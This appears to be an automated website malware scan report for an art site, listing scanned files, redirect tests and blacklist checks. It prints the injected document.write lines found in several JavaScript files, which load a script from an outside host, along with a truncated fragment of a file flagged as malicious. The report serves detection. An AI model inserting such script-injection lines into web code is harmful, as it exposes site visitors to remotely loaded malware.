Scanned pages/files
Request | Server response | Status |
http://jupoart.com/ | 200 OK Content-Length: 9879 Content-Type: text/html | clean |
http://jupoart.com/js/jquery-1.10.2.min.js | 200 OK Content-Length: 93498 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782898"></script>'); | ||
http://jupoart.com/js/lightbox-2.6.min.js | 200 OK Content-Length: 7780 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782900"></script>'); | ||
http://jupoart.com/js/jquery.min.js | 200 OK Content-Length: 93498 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782899"></script>'); | ||
http://jupoart.com/js/skel.min.js | 200 OK Content-Length: 21830 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var skel=function(){var a={config:{prefix:null,preloadStyleSheets:!1,pollOnce:!1,resetCSS:!1,normalizeCSS:!1,boxModel:null,useOrientation:!1,useRTL:!1,pollOnLock:!1,usePerpetualLock:!0,useDomainLock:!0,containers:960,grid:{collapse:!1,gutters:40},breakpoints:{all:{range:"*",hasStyleSheet:!1}},events:{}},isConfigured:!1,isInit:!1,lockState:null,stateId:"",me:null,breakpoints:[],breakpointList:[],events:[],plugins:{},cache:{elements:{},states:{}},locations:{html:null,head:null,body:null},vars:{},l !0;a.isConfigured&&a.init()}};a.preInit();return a}(); Antivirus reports:
| ||
http://jupoart.com/js/init.js | 200 OK Content-Length: 9027 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782897"></script>'); | ||
http://jupoart.com/paints/img1.JPG | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 06 Apr 2014 16:41:20 GMT Location: http://jupoart.com/paints/img1.jpg Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://jupoart.com/paints/img1.jpg | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://jupoart.com/paints/img2.JPG | 200 OK Content-Length: 300192 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img3.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img4.JPG | 200 OK Content-Length: 302423 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img5.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img6.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img7.JPG | 200 OK Content-Length: 300648 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img8.JPG | 200 OK Content-Length: 300736 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jupoart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 16:41:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 9879
Content-Type: text/html
Last-Modified: Sat, 05 Apr 2014 23:21:17 GMT
...9879 bytes of data.
GET / HTTP/1.1
Host: jupoart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 16:41:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 9879
Content-Type: text/html
Last-Modified: Sat, 05 Apr 2014 23:21:17 GMT
...9879 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jupoart.com
Referer: http://www.google.com/search?q=jupoart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jupoart.com
Referer: http://www.google.com/search?q=jupoart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jupoart.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jupoart.com/
Result: jupoart.com is not infected or malware details are not published yet.
Result: jupoart.com is not infected or malware details are not published yet.